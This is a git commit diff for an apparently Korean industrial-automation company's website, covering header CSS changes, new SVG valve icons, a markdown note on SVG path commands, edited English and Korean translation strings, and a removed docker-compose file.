Very Good Version !

This commit is contained in:
Wind
2026-02-19 13:20:09 +09:00
parent e33d42bd7e
commit 40bfe784a6
89 changed files with 2864 additions and 70917 deletions

View File

@@ -1,22 +0,0 @@
version: '3.8'
services:
# 1. 관리 도구 (Nginx Proxy Manager)
npm:
image: 'jc21/nginx-proxy-manager:latest'
container_name: npm-admin
restart: unless-stopped
ports:
- '80:80' # HTTP 외부 접속용
- '81:81' # 관리자 화면 접속용 (HMI 역할)
- '443:443' # HTTPS 보안 접속용
volumes:
- ./npm/data:/data
- ./npm/letsencrypt:/etc/letsencrypt
# 2. 실제 홈페이지 (공사 중 페이지)
web-server:
image: nginx:alpine
container_name: hanmo-home
restart: unless-stopped
volumes:
- ./html:/usr/share/nginx/html:ro

View File

@@ -38,16 +38,70 @@ body {
filter: grayscale(0); filter: grayscale(0);
} }
/* ── 헤더 & 네비게이션 ───────────────────────────────────── */
/* 기본 상태: 투명 배경 위 (흰색 텍스트) */
.nav-link {
color: white;
}
#brand-name {
color: white;
}
/* 스크롤 시: 흰색 배경 (어두운 텍스트) */
#main-header.scrolled {
background: rgba(255, 255, 255, 0.95);
backdrop-filter: blur(16px);
box-shadow: 0 4px 20px rgba(0, 0, 0, 0.08);
}
#main-header.scrolled .nav-link {
color: #1e293b;
}
#main-header.scrolled #brand-name {
color: #1e293b;
}
/* ── 언어 전환 버튼 ───────────────────────────────────────── */ /* ── 언어 전환 버튼 ───────────────────────────────────────── */
/* 기본 상태: 투명 배경 위 (흰색) */
.lang-btn { .lang-btn {
background: transparent; background: transparent;
opacity: 0.5; color: white;
transition: all 0.2s; opacity: 0.85;
transition: all 0.3s;
} }
.lang-btn:hover { .lang-btn:hover {
opacity: 0.8;
}
.lang-btn.active-lang {
background: #2563eb;
opacity: 1; opacity: 1;
} }
.lang-btn.active-lang {
background: rgba(37, 99, 235, 0.9);
opacity: 1;
}
/* 스크롤 시: 흰색 배경 (어두운 텍스트) */
#main-header.scrolled .lang-btn {
color: #1e293b;
opacity: 0.7;
}
#main-header.scrolled .lang-btn:hover {
opacity: 1;
}
#main-header.scrolled .lang-btn.active-lang {
background: #2563eb;
color: white;
opacity: 1;
}
/* 언어 버튼 컨테이너 테두리 */
#lang-container {
border-color: rgba(255, 255, 255, 0.3);
}
#main-header.scrolled #lang-container {
border-color: rgba(0, 0, 0, 0.15);
}

View File

Before

Width:  |  Height:  |  Size: 1.3 MiB

After

Width:  |  Height:  |  Size: 1.3 MiB

View File

Before

Width:  |  Height:  |  Size: 2.0 MiB

After

Width:  |  Height:  |  Size: 2.0 MiB

View File

Before

Width:  |  Height:  |  Size: 2.4 MiB

After

Width:  |  Height:  |  Size: 2.4 MiB

View File

Before

Width:  |  Height:  |  Size: 2.4 MiB

After

Width:  |  Height:  |  Size: 2.4 MiB

View File

Before

Width:  |  Height:  |  Size: 1.8 MiB

After

Width:  |  Height:  |  Size: 1.8 MiB

View File

Before

Width:  |  Height:  |  Size: 1.7 MiB

After

Width:  |  Height:  |  Size: 1.7 MiB

View File

Before

Width:  |  Height:  |  Size: 2.0 MiB

After

Width:  |  Height:  |  Size: 2.0 MiB

View File

Before

Width:  |  Height:  |  Size: 2.2 MiB

After

Width:  |  Height:  |  Size: 2.2 MiB

View File

Before

Width:  |  Height:  |  Size: 2.5 MiB

After

Width:  |  Height:  |  Size: 2.5 MiB

View File

Before

Width:  |  Height:  |  Size: 521 KiB

After

Width:  |  Height:  |  Size: 521 KiB

View File

Before

Width:  |  Height:  |  Size: 190 KiB

After

Width:  |  Height:  |  Size: 190 KiB

View File

Before

Width:  |  Height:  |  Size: 4.9 KiB

After

Width:  |  Height:  |  Size: 4.9 KiB

View File

@@ -0,0 +1,56 @@
<svg xmlns="http://www.w3.org/2000/svg" style="display: none;">
<defs>
<!-- Control Valve Icon - 512x512 viewBox -->
<symbol id="icon-cv" viewBox="0 0 512 512">
<g fill="currentColor">
<!-- 왼쪽 액추에이터 (삼각형) -->
<path d="M 120 310 L 120 490 L 246 400 Z"/>
<!-- 오른쪽 액추에이터 (삼각형) -->
<path d="M 392 310 L 392 490 L 266 400 Z"/>
<!-- 중앙 스템 (두꺼운 선) -->
<rect x="246" y="230" width="20" height="170" rx="10"/>
<!-- 밸브 본체 (아치형) -->
<path d="M 100 230 Q 256 24, 412 230"
stroke="currentColor"
stroke-width="30"
fill="none"
stroke-linecap="round"/>
<!-- 밸브 본체 하단 -->
<path d="M 100 230 L 100 250 L 412 250 L 412 230"
fill="currentColor"/>
</g>
</symbol>
<!-- XV Valve Icon - 512x512 viewBox -->
<symbol id="icon-xv" viewBox="0 0 512 512">
<g fill="currentColor">
<!-- 왼쪽 액추에이터 -->
<path d="M 120 290 L 120 470 L 246 380 Z"/>
<!-- 오른쪽 액추에이터 -->
<path d="M 392 290 L 392 470 L 266 380 Z"/>
<!-- 중앙 스템 -->
<rect x="246" y="240" width="20" height="150" rx="10"/>
<!-- 상단 사각형 케이스 (외곽) -->
<rect x="156" y="80" width="200" height="160"
stroke="currentColor"
stroke-width="20"
fill="none"
rx="10"/>
<!-- 내부 사각형 -->
<rect x="156" y="80" width="200" height="50"
stroke="currentColor"
stroke-width="15"
fill="none"
rx="5"/>
</g>
</symbol>
</defs>
</svg>

After

Width:  |  Height:  |  Size: 1.8 KiB

View File

@@ -0,0 +1,243 @@
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!-- Created with Inkscape (http://www.inkscape.org/) -->
<svg
width="32"
height="32"
viewBox="0 0 8.4666662 8.4666662"
version="1.1"
id="CV"
sodipodi:docname="CV.svg"
inkscape:version="1.4.2 (f4327f4, 2025-05-13)"
xmlns:inkscape="http://www.inkscape.org/namespaces/inkscape"
xmlns:sodipodi="http://sodipodi.sourceforge.net/DTD/sodipodi-0.dtd"
xmlns:xlink="http://www.w3.org/1999/xlink"
xmlns="http://www.w3.org/2000/svg"
xmlns:svg="http://www.w3.org/2000/svg">
<sodipodi:namedview
id="namedview1"
pagecolor="#ffffff"
bordercolor="#000000"
borderopacity="0.25"
inkscape:showpageshadow="2"
inkscape:pageopacity="0.0"
inkscape:pagecheckerboard="0"
inkscape:deskcolor="#d1d1d1"
inkscape:document-units="mm"
showgrid="true"
showguides="true"
inkscape:lockguides="true"
inkscape:zoom="16"
inkscape:cx="21.4375"
inkscape:cy="18.53125"
inkscape:window-width="2560"
inkscape:window-height="1406"
inkscape:window-x="-11"
inkscape:window-y="-11"
inkscape:window-maximized="1"
inkscape:current-layer="icon-cv">
<inkscape:grid
id="grid2"
units="px"
originx="0"
originy="0"
spacingx="0.26458332"
spacingy="0.26458332"
empcolor="#0099e5"
empopacity="0.30196078"
color="#0099e5"
opacity="0.14901961"
empspacing="5"
enabled="true"
visible="true" />
<sodipodi:guide
position="4.2627494,9.4789286"
orientation="1,0"
id="guide2"
inkscape:locked="true" />
<sodipodi:guide
position="0.51737855,-0.29502712"
orientation="1,0"
id="guide3"
inkscape:locked="true" />
<sodipodi:guide
position="-0.65234687,-0.63244791"
orientation="0.70710678,-0.70710678"
id="guide4"
inkscape:locked="true" />
<sodipodi:guide
position="7.9518834,9.523918"
orientation="1,0"
id="guide5"
inkscape:locked="true" />
<sodipodi:guide
position="9.0991141,4.2601536"
orientation="0,-1"
id="guide6"
inkscape:locked="true" />
<sodipodi:guide
position="8.784188,7.9267929"
orientation="0,-1"
id="guide7"
inkscape:locked="true" />
<sodipodi:guide
position="-1.6983513,0.78471943"
orientation="0,-1"
id="guide8"
inkscape:locked="true" />
<sodipodi:guide
position="-1.8670617,0.51478279"
orientation="0,-1"
id="guide9"
inkscape:locked="true" />
<sodipodi:guide
position="4.4652019,4.0464538"
orientation="-0.70710678,-0.70710678"
id="guide10"
inkscape:locked="true" />
</sodipodi:namedview>
<defs
id="defs1">
<linearGradient
id="swatch6"
inkscape:swatch="solid">
<stop
style="stop-color:#000000;stop-opacity:1;"
offset="0"
id="stop6" />
</linearGradient>
<linearGradient
id="swatch5"
inkscape:swatch="solid">
<stop
style="stop-color:#000000;stop-opacity:1;"
offset="0"
id="stop5" />
</linearGradient>
<linearGradient
id="swatch4"
inkscape:swatch="solid">
<stop
style="stop-color:#000000;stop-opacity:1;"
offset="0"
id="stop4" />
</linearGradient>
<linearGradient
id="swatch3"
inkscape:swatch="solid">
<stop
style="stop-color:#000000;stop-opacity:1;"
offset="0"
id="stop3" />
</linearGradient>
<linearGradient
id="swatch2"
inkscape:swatch="solid">
<stop
style="stop-color:#000000;stop-opacity:1;"
offset="0"
id="stop2" />
</linearGradient>
<linearGradient
id="swatch1"
inkscape:swatch="solid">
<stop
style="stop-color:#000000;stop-opacity:1;"
offset="0"
id="stop1" />
</linearGradient>
<linearGradient
id="swatch18"
inkscape:swatch="solid">
<stop
style="stop-color:#000000;stop-opacity:1;"
offset="0"
id="stop18" />
</linearGradient>
<linearGradient
id="swatch16"
inkscape:swatch="solid">
<stop
style="stop-color:#000000;stop-opacity:1;"
offset="0"
id="stop16" />
</linearGradient>
<linearGradient
id="swatch15"
inkscape:swatch="solid">
<stop
style="stop-color:#000000;stop-opacity:1;"
offset="0"
id="stop15" />
</linearGradient>
<linearGradient
id="swatch14"
inkscape:swatch="solid">
<stop
style="stop-color:#2864eb;stop-opacity:1;"
offset="0"
id="stop14" />
</linearGradient>
<linearGradient
inkscape:collect="always"
xlink:href="#swatch14"
id="linearGradient18"
x1="1.7277834"
y1="5.9455218"
x2="8.4411774"
y2="5.9455218"
gradientUnits="userSpaceOnUse"
gradientTransform="matrix(0.66393903,0,0,0.85634804,2.3787064,1.2196347)" />
<linearGradient
inkscape:collect="always"
xlink:href="#swatch14"
id="linearGradient1"
x1="4.0094132"
y1="5.0275702"
x2="4.5385804"
y2="5.0275702"
gradientUnits="userSpaceOnUse"
gradientTransform="translate(-0.02338608)" />
<linearGradient
inkscape:collect="always"
xlink:href="#swatch14"
id="linearGradient5"
x1="0.96664286"
y1="-2.2531047"
x2="7.6929812"
y2="-2.2531047"
gradientUnits="userSpaceOnUse"
gradientTransform="matrix(0.95980837,0,0,-0.92117588,0.10386417,0.02559155)" />
<linearGradient
inkscape:collect="always"
xlink:href="#swatch14"
id="linearGradient6"
x1="0.84656554"
y1="6.2969909"
x2="4.0181665"
y2="6.2969909"
gradientUnits="userSpaceOnUse"
gradientTransform="translate(-0.02338609,-0.02338608)" />
</defs>
<g
inkscape:label="Layer 1"
inkscape:groupmode="layer"
id="icon-cv">
<path
style="fill:none;fill-opacity:1;stroke:url(#linearGradient18);stroke-width:0.529167;stroke-dasharray:none"
d="M 7.6511642,4.8306254 V 7.7779116 L 4.4998531,6.2561101 Z"
id="path14-1" />
<path
style="fill:none;fill-opacity:1;stroke:url(#linearGradient6);stroke-width:0.529167;stroke-dasharray:none;stroke-opacity:1"
d="M 0.83074929,4.7858732 V 7.7610021 L 3.977069,6.2248243 Z"
id="path14-1-7" />
<path
style="fill:none;fill-opacity:1;stroke:url(#linearGradient1);stroke-width:0.529167;stroke-dasharray:none;stroke-opacity:1"
d="M 4.2506107,3.8353499 V 6.2197903"
id="path19" />
<path
id="path4"
style="fill:none;stroke:url(#linearGradient5);stroke-width:0.497572"
d="m 7.2337027,3.69276 a 2.9740486,3.1851437 0 0 0 -1.4870244,-2.7584154 2.9740486,3.1851437 0 0 0 -2.9740486,7e-8 A 2.9740486,3.1851437 0 0 0 1.2856054,3.69276 Z" />
</g>
</svg>

After

Width:  |  Height:  |  Size: 7.0 KiB

View File

@@ -0,0 +1,227 @@
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!-- Created with Inkscape (http://www.inkscape.org/) -->
<svg
width="32"
height="32"
viewBox="0 0 8.4666662 8.4666662"
version="1.1"
id="svg1"
sodipodi:docname="XV.svg"
inkscape:version="1.4.2 (f4327f4, 2025-05-13)"
xmlns:inkscape="http://www.inkscape.org/namespaces/inkscape"
xmlns:sodipodi="http://sodipodi.sourceforge.net/DTD/sodipodi-0.dtd"
xmlns:xlink="http://www.w3.org/1999/xlink"
xmlns="http://www.w3.org/2000/svg"
xmlns:svg="http://www.w3.org/2000/svg">
<sodipodi:namedview
id="namedview1"
pagecolor="#ffffff"
bordercolor="#000000"
borderopacity="0.25"
inkscape:showpageshadow="2"
inkscape:pageopacity="0.0"
inkscape:pagecheckerboard="0"
inkscape:deskcolor="#d1d1d1"
inkscape:document-units="mm"
showgrid="true"
showguides="true"
inkscape:lockguides="true"
inkscape:zoom="18.234375"
inkscape:cx="9.5972581"
inkscape:cy="15.218509"
inkscape:window-width="1138"
inkscape:window-height="1240"
inkscape:window-x="646"
inkscape:window-y="16"
inkscape:window-maximized="0"
inkscape:current-layer="icon-XV">
<inkscape:grid
id="grid2"
units="px"
originx="0"
originy="0"
spacingx="0.26458332"
spacingy="0.26458332"
empcolor="#0099e5"
empopacity="0.30196078"
color="#0099e5"
opacity="0.14901961"
empspacing="5"
enabled="true"
visible="true" />
<sodipodi:guide
position="4.2627494,9.4789286"
orientation="1,0"
id="guide2"
inkscape:locked="true" />
<sodipodi:guide
position="0.51737855,-0.29502712"
orientation="1,0"
id="guide3"
inkscape:locked="true" />
<sodipodi:guide
position="-0.65234687,-0.63244791"
orientation="0.70710678,-0.70710678"
id="guide4"
inkscape:locked="true" />
<sodipodi:guide
position="7.9518834,9.523918"
orientation="1,0"
id="guide5"
inkscape:locked="true" />
<sodipodi:guide
position="9.0991141,4.2601536"
orientation="0,-1"
id="guide6"
inkscape:locked="true" />
<sodipodi:guide
position="8.784188,7.9267929"
orientation="0,-1"
id="guide7"
inkscape:locked="true" />
<sodipodi:guide
position="-1.6983513,0.78471943"
orientation="0,-1"
id="guide8"
inkscape:locked="true" />
<sodipodi:guide
position="-1.8670617,0.51478279"
orientation="0,-1"
id="guide9"
inkscape:locked="true" />
<sodipodi:guide
position="4.4652019,4.0464538"
orientation="-0.70710678,-0.70710678"
id="guide10"
inkscape:locked="true" />
</sodipodi:namedview>
<defs
id="defs1">
<linearGradient
id="swatch4"
inkscape:swatch="solid">
<stop
style="stop-color:#000000;stop-opacity:1;"
offset="0"
id="stop4" />
</linearGradient>
<linearGradient
id="swatch3"
inkscape:swatch="solid">
<stop
style="stop-color:#000000;stop-opacity:1;"
offset="0"
id="stop3" />
</linearGradient>
<linearGradient
id="swatch2"
inkscape:swatch="solid">
<stop
style="stop-color:#000000;stop-opacity:1;"
offset="0"
id="stop2" />
</linearGradient>
<linearGradient
id="swatch1"
inkscape:swatch="solid">
<stop
style="stop-color:#000000;stop-opacity:1;"
offset="0"
id="stop1" />
</linearGradient>
<linearGradient
id="swatch18"
inkscape:swatch="solid">
<stop
style="stop-color:#000000;stop-opacity:1;"
offset="0"
id="stop18" />
</linearGradient>
<linearGradient
id="swatch16"
inkscape:swatch="solid">
<stop
style="stop-color:#000000;stop-opacity:1;"
offset="0"
id="stop16" />
</linearGradient>
<linearGradient
id="swatch15"
inkscape:swatch="solid">
<stop
style="stop-color:#000000;stop-opacity:1;"
offset="0"
id="stop15" />
</linearGradient>
<linearGradient
id="swatch14"
inkscape:swatch="solid">
<stop
style="stop-color:#2864eb;stop-opacity:1;"
offset="0"
id="stop14" />
</linearGradient>
<linearGradient
inkscape:collect="always"
xlink:href="#swatch14"
id="linearGradient16"
x1="1.4266078"
y1="2.1372342"
x2="7.144485"
y2="2.1372342"
gradientUnits="userSpaceOnUse"
gradientTransform="matrix(0.87269478,0,0,1.0101615,0.51750303,0.21044164)" />
<linearGradient
inkscape:collect="always"
xlink:href="#swatch14"
id="linearGradient1"
x1="4.0094132"
y1="5.0275702"
x2="4.5385804"
y2="5.0275702"
gradientUnits="userSpaceOnUse" />
<linearGradient
inkscape:collect="always"
xlink:href="#swatch14"
id="linearGradient2"
x1="1.973379"
y1="1.8645531"
x2="6.5005426"
y2="1.8645531"
gradientUnits="userSpaceOnUse"
gradientTransform="translate(0,0.0725507)" />
</defs>
<g
inkscape:label="Layer 1"
inkscape:groupmode="layer"
id="icon-XV">
<ellipse
style="fill:none;fill-opacity:1;stroke-width:0.265;stroke-dasharray:none"
id="path10"
cx="4.2402544"
cy="4.1840181"
rx="2.901819"
ry="2.9917979" />
<path
style="fill:none;fill-opacity:1;stroke:url(#linearGradient16);stroke-width:0.496843;stroke-dasharray:none;stroke-opacity:1"
d="M 1.8622283,0.77852414 6.6375951,0.75580052 6.6521989,3.9370624 1.8622288,3.9825089 Z"
id="path12" />
<path
style="fill:none;fill-opacity:1;stroke:#2864eb;stroke-width:0.52916667;stroke-dasharray:none;stroke-opacity:1"
d="M 7.5471292,4.78219 V 7.7294762 L 4.3958181,6.2076747 Z"
id="path14-1" />
<path
style="fill:none;fill-opacity:1;stroke:#2864eb;stroke-width:0.52916667;stroke-dasharray:none;stroke-opacity:1"
d="M 0.89517625,4.7887389 V 7.7638678 L 4.041496,6.22769 Z"
id="path14-1-7" />
<path
style="fill:none;fill-opacity:1;stroke:url(#linearGradient1);stroke-width:0.529167;stroke-dasharray:none;stroke-opacity:1"
d="M 4.2739968,3.8353499 V 6.2197903"
id="path19" />
<path
style="fill:none;stroke:url(#linearGradient2);stroke-width:0.264583"
d="m 1.973379,1.9516138 c 4.5271635,-0.02902 4.5271635,-0.02902 4.5271635,-0.02902"
id="path1" />
</g>
</svg>

After

Width:  |  Height:  |  Size: 6.6 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 99 KiB

View File

@@ -0,0 +1,26 @@
이제 SVG 명령어들을 한눈에 볼 수 있는 요약표를 만들어드릴게요. 과 처럼 대문자/소문자의 차이는 절대 좌표 vs 상대 좌표라는 점을 기억하시면 됩니다.
🔹 주요 Path 명령어 요약표
![alt text](path.png)
🔹 주요 Path 명령어 요약표
| 명령어 | 의미 | 대문자(절대) | 소문자(상대) | 예시 |
|--------|------|--------------|--------------|------|
| **M / m** | Move To (좌표 이동) | 지정한 좌표로 이동 | 현재 위치 기준으로 이동 | `M 10 20` / `m 10 20` |
| **L / l** | Line To (직선 그리기) | 지정 좌표까지 직선 | 현재 위치에서 상대 이동 직선 | `L 30 40` / `l 30 40` |
| **H / h** | Horizontal Line | 지정 x좌표까지 수평선 | 현재 위치에서 x축 상대 이동 | `H 50` / `h 50` |
| **V / v** | Vertical Line | 지정 y좌표까지 수직선 | 현재 위치에서 y축 상대 이동 | `V 60` / `v 60` |
| **C / c** | Cubic Bézier Curve | 절대 좌표로 곡선 제어점 지정 | 상대 좌표로 곡선 제어점 지정 | `C x1 y1, x2 y2, x y` |
| **Q / q** | Quadratic Bézier Curve | 절대 좌표로 곡선 제어점 지정 | 상대 좌표로 곡선 제어점 지정 | `Q x1 y1, x y` |
| **A / a** | Arc (호 그리기) | 절대 좌표로 원호 | 상대 좌표로 원호 | `A rx ry x-axis-rotation large-arc-flag sweep-flag x y` |
| **Z / z** | Close Path | 현재 경로를 시작점과 연결해 닫기 | 동일 | `Z` |
🔹 핵심 정리
• 대문자 → 절대 좌표 (캔버스 기준)
• 소문자 → 상대 좌표 (현재 위치 기준)
• /은 시작점 이동, /은 직선, /는 곡선, 는 닫기

View File

Before

Width:  |  Height:  |  Size: 338 KiB

After

Width:  |  Height:  |  Size: 338 KiB

View File

Before

Width:  |  Height:  |  Size: 1.4 MiB

After

Width:  |  Height:  |  Size: 1.4 MiB

View File

@@ -12,7 +12,7 @@ const translations = {
'nav.services' : 'References', 'nav.services' : 'References',
'nav.about' : 'About', 'nav.about' : 'About',
'nav.contact' : 'Contact', 'nav.contact' : 'Contact',
'nav.quote' : 'Request Quote', 'nav.quote' : 'Inquiry',
// HERO // HERO
'hero.badge' : 'Precision Industrial Control', 'hero.badge' : 'Precision Industrial Control',
@@ -68,23 +68,23 @@ const translations = {
'db.btn' : 'Get Infrastructure Consultation', 'db.btn' : 'Get Infrastructure Consultation',
// INSTRUMENTS // INSTRUMENTS
'inst.badge' : 'Precision Measurement', 'inst.badge' : 'Precision Measurement & Actuation',
'inst.title' : 'Control Instruments', 'inst.title' : 'Control Instruments',
'inst.desc' : 'Smart field instruments engineered for accuracy and reliability in demanding industrial environments.', 'inst.desc' : 'Optimal Precision Starts with Understanding of Your Environment',
'inst.i1.title' : 'Flow Transmitters', 'inst.i1.title' : 'Flow Transmitters',
'inst.i1.desc' : 'Magnetic, Coriolis, and vortex flow meters with ±0.5% accuracy', 'inst.i1.desc' : 'Magnetic, Coriolis, and Vortex, traditional flowmeters',
'inst.i2.title' : 'Pressure Transmitters', 'inst.i2.title' : 'Pressure Transmitters',
'inst.i2.desc' : 'Differential and absolute pressure sensors for ultra-high sensitivity', 'inst.i2.desc' : 'Differential and absolute pressure sensors for ultra-high sensitivity',
'inst.i3.title' : 'Temperature Sensors', 'inst.i3.title' : 'Temperature Sensors',
'inst.i3.desc' : 'RTD, thermocouple, and infrared temperature measurement', 'inst.i3.desc' : 'RTD, thermocouple, and infrared temperature measurement',
'inst.i4.title' : 'Level Transmitters', 'inst.i4.title' : 'Level Transmitters',
'inst.i4.desc' : 'Ultrasonic, radar, and capacitive level sensors', 'inst.i4.desc' : 'Ultrasonic, radar, capacitive and float level sensors',
'inst.i5.title' : 'Analytical Sensors', 'inst.i5.title' : 'Analytical Sensors',
'inst.i5.desc' : 'pH, conductivity, oxygen, and dissolved gas analyzers', 'inst.i5.desc' : 'pH, conductivity, oxygen, and dissolved gas analyzer',
'inst.i6.title' : 'Control Valves', 'inst.i6.title' : 'Control Valves',
'inst.i6.desc' : 'Smart positioners with HART communication', 'inst.i6.desc' : 'Smart positioners with HART communication',
'inst.i7.title' : 'Vibration Monitors', 'inst.i7.title' : 'Shutoff Valves',
'inst.i7.desc' : 'Accelerometers and velocity sensors for predictive maintenance', 'inst.i7.desc' : 'Pneumatic, Electrical on/off valves with Explosion proof',
'inst.i8.title' : 'Smart Data Loggers', 'inst.i8.title' : 'Smart Data Loggers',
'inst.i8.desc' : 'IoT-enabled data acquisition units with cloud connectivity', 'inst.i8.desc' : 'IoT-enabled data acquisition units with cloud connectivity',
'inst.custom.title' : 'Custom Integration Available', 'inst.custom.title' : 'Custom Integration Available',
@@ -94,30 +94,30 @@ const translations = {
// REFERENCES // REFERENCES
'svc.badge' : 'Referenced Plant Varieties', 'svc.badge' : 'Referenced Plant Varieties',
'svc.title' : 'Versatile Automation References', 'svc.title' : 'Versatile Process References',
'svc.desc' : 'From Deep Understanding of various industry references to Seamless Execution.', 'svc.desc' : 'From deep understanding of various industry references to Seamless Execution.',
'svc.s1.title' : 'DCS / SCADA', 'svc.s1.title' : 'DCS / SCADA',
'svc.s1.desc' : 'Semiconductor Solvent Recovery Plant., 80% Hydrazin Plant, SNCR & SCR Envirionmental Plant, etc', 'svc.s1.desc' : 'Semiconductor Solvent Recovery Plant., 80% Hydrazin Plant, SNCR & SCR Envirionmental Plant, etc',
'svc.s1.item1' : 'Semiconductor Solvent Recovery Plant', 'svc.s1.item1' : 'Semiconductor Solvent Recovery Plant',
'svc.s1.item2' : '80% Hydrazin Plant', 'svc.s1.item2' : '80% Hydrazin Plant',
'svc.s1.item3' : 'SNCR & SCR in Power Plant', 'svc.s1.item3' : 'SNCR & SCR in Power Plant',
'svc.s1.item4' : 'Oil Tank Terminal', 'svc.s1.item4' : 'Oil Tank Terminal',
'svc.s1.link' : 'Learn More', //'svc.s1.link' : 'Learn More',
'svc.s2.title' : 'Batch Plant', 'svc.s2.title' : 'Batch Plant',
'svc.s2.desc' : 'Real-time monitoring platforms with advanced HMI and secure remote access protocols.', 'svc.s2.desc' : 'Real-time monitoring platforms with advanced HMI and secure remote access protocols.',
'svc.s2.item1' : 'Micro Capsule forming agent plant', 'svc.s2.item1' : 'Micro Capsule forming agent plant',
'svc.s2.item2' : 'ADCA,HDCA Plant', 'svc.s2.item2' : 'ADCA,HDCA Plant',
'svc.s2.item3' : 'Vacuum Furnace Plant - Decorative Stainless Plate', 'svc.s2.item3' : 'Vacuum Furnace Plant - Decorative Stainless Plate',
'svc.s2.link' : 'Case Studies', //'svc.s2.link' : 'Case Studies',
'svc.s3.title' : 'Other Projects', 'svc.s3.title' : 'Other Projects',
'svc.s3.desc' : 'Various industrial automation projects.', 'svc.s3.desc' : 'Various industrial automation projects.',
'svc.s3.item1' : 'Waste to Energy Incineration Plant', 'svc.s3.item1' : 'Waste to Energy Incinerator Plant',
'svc.s3.item2' : 'Copper Rod Continuous Casting Plant', 'svc.s3.item2' : 'Copper Continuous Casting Plant',
'svc.s3.item3' : 'Bearing Continuous Heat Treatment Plant', 'svc.s3.item3' : 'Bearing Heat Treatment Plant',
'svc.s3.item4' : 'High Speed Cold Rolling Continuous Casting Plant', 'svc.s3.item4' : 'Chlor-Alkali Plant',
'svc.s3.link' : 'CASE STUDIES', //'svc.s3.link' : 'CASE STUDIES',
'svc.s4.title' : 'Instruments', 'svc.s4.title' : 'Instruments',
'svc.s4.desc' : 'Smart field sensors for flow, pressure, and temperature with high-accuracy calibration.', 'svc.s4.desc' : 'Smart field sensors for flow, pressure, and temperature with high-accuracy calibration.',
@@ -127,7 +127,7 @@ const translations = {
'svc.s4.item4' : 'Flownics', 'svc.s4.item4' : 'Flownics',
'svc.s4.item5' : 'Komoto - (Motoyama Korea)', 'svc.s4.item5' : 'Komoto - (Motoyama Korea)',
'svc.s4.item6' : 'Autonics - (Konics)', 'svc.s4.item6' : 'Autonics - (Konics)',
'svc.s4.link' : 'Product Catalog', //'svc.s4.link' : 'Product Catalog',
// ABOUT // ABOUT
'about.badge' : 'About Hanmo', 'about.badge' : 'About Hanmo',
@@ -164,10 +164,10 @@ const translations = {
'nav.batch' : '배치 프로세스', 'nav.batch' : '배치 프로세스',
'nav.dbsvr' : '데이터베이스 서버', 'nav.dbsvr' : '데이터베이스 서버',
'nav.products' : '계측기기', 'nav.products' : '계측기기',
'nav.services' : '실적 플랜트 분야', 'nav.services' : '실적 플랜트',
'nav.about' : '회사소개', 'nav.about' : '회사소개',
'nav.contact' : '문의하기', 'nav.contact' : '문의하기',
'nav.quote' : '견적 요청', 'nav.quote' : '상담 신청',
// HERO // HERO
'hero.badge' : '정밀 공정 제어 시스템', 'hero.badge' : '정밀 공정 제어 시스템',
@@ -238,14 +238,14 @@ const translations = {
'inst.i5.desc' : 'pH, 전도도, 산소, 용존 가스 분석기', 'inst.i5.desc' : 'pH, 전도도, 산소, 용존 가스 분석기',
'inst.i6.title' : '컨트롤 밸브', 'inst.i6.title' : '컨트롤 밸브',
'inst.i6.desc' : 'HART 통신 지원 스마트 포지셔너', 'inst.i6.desc' : 'HART 통신 지원 스마트 포지셔너',
'inst.i7.title' : '진동 모니터', 'inst.i7.title' : '온오프 밸브',
'inst.i7.desc' : '예측 유지보수를 위한 가속도계 및 속도 센서', 'inst.i7.desc' : '공압, 전기식 셧오프 밸브',
'inst.i8.title' : '스마트 데이터 로거', 'inst.i8.title' : '스마트 데이터 로거',
'inst.i8.desc' : '클라우드 연결 기능을 갖춘 IoT 데이터 수집 장치', 'inst.i8.desc' : '클라우드 연결 기능을 갖춘 IoT 데이터 수집 장치',
'inst.custom.title' : '맞춤형 통합 솔루션 제공', 'inst.custom.title' : '맞춤형 통합 솔루션 제공',
'inst.custom.desc' : '모든 계측기기는 당사의 DCS 및 SCADA 플랫폼과 원활하게 통합됩니다. 특수 응용 분야에 맞는 커스텀 구성이 가능합니다.', 'inst.custom.desc' : '모든 계측기기는 당사의 DCS 및 SCADA 플랫폼과 원활하게 통합됩니다. 특수 응용 분야에 맞는 커스텀 구성이 가능합니다.',
'inst.custom.btn' : '맞춤 구성 요청', 'inst.custom.btn' : '맞춤 구성 요청',
'inst.quote' : '견적 요청 →', 'inst.quote' : '상담 신청 →',
// REFERENCES // REFERENCES
'svc.badge' : '실적 플랜트 분야', 'svc.badge' : '실적 플랜트 분야',
@@ -257,20 +257,20 @@ const translations = {
'svc.s1.item2' : '80% 하이드라진 플랜트', 'svc.s1.item2' : '80% 하이드라진 플랜트',
'svc.s1.item3' : '발전소 SNCR & SCR 플랜트', 'svc.s1.item3' : '발전소 SNCR & SCR 플랜트',
'svc.s1.item4' : '오일 탱크 터미널 플랜트', 'svc.s1.item4' : '오일 탱크 터미널 플랜트',
'svc.s1.link' : '자세히 보기', // 'svc.s1.link' : '자세히 보기',
'svc.s2.title' : '배치 플랜트', 'svc.s2.title' : '배치 플랜트',
'svc.s2.desc' : '실시간 모니터링 플랫폼과 고급 HMI, 안전한 원격 액세스 프로토콜을 갖춘 배치 플랜트 제어 시스템', 'svc.s2.desc' : '실시간 모니터링 플랫폼과 고급 HMI, 안전한 원격 액세스 프로토콜을 갖춘 배치 플랜트 제어 시스템',
'svc.s2.item1' : '마이크로 캡슐 발포제 플랜트', 'svc.s2.item1' : '마이크로 캡슐 발포제 플랜트',
'svc.s2.item2' : 'ADCA,HDCA 플랜트', 'svc.s2.item2' : 'ADCA,HDCA 플랜트',
'svc.s2.item3' : '진공 열처리로 플랜트', 'svc.s2.item3' : '진공 열처리로 플랜트',
'svc.s2.link' : '사례 연구', // 'svc.s2.link' : '사례 연구',
'svc.s3.title' : '기타 프로젝트', 'svc.s3.title' : '기타 프로젝트',
'svc.s3.desc' : '기타 핵심 산업 자동화', 'svc.s3.desc' : '기타 핵심 산업 자동화',
'svc.s3.item1' : '쓰레기 소각장 플랜트', 'svc.s3.item1' : '쓰레기 소각장 플랜트',
'svc.s3.item2' : '구리 환재 연속 주조로', 'svc.s3.item2' : '구리 환재 연속 주조로',
'svc.s3.item3' : '베어링 연속 열처리로 플랜트', 'svc.s3.item3' : '베어링 연속 열처리로 플랜트',
'svc.s3.item4' : '고속 냉간 연속 주조로 플랜트', 'svc.s3.item4' : '가성소다, 염소 전해 플랜트',
'svc.s3.link' : '데이터 보안', // 'svc.s3.link' : '데이터 보안',
